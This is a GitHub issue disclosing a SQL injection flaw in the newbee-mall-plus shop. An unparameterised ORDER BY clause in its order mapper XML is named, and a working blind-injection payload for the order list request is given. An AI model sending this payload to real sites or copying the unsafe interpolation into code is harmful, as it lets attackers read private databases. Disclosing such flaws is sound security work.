 SQL injection vulnerability 

 SQL injection exists in newbee mall, est="sortField!" on order page =  null and order!=  null"> 
 order by ${sortField} ${order} is not precompiled, allowing logged-in user attackers to steal sensitive information such as databases by constructing malicious sql statements. 
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml
![image](https://github.com/newbee-ltd/newbee-mall-plus/assets/126563545/8840316d-02de-4ca3-abe0-69919ca09672)

Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
![image](https://github.com/newbee-ltd/newbee-mall-plus/assets/126563545/42e2ec53-0313-4268-902e-bec2a97a17f4)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability #47

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

SQL injection vulnerability #47

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions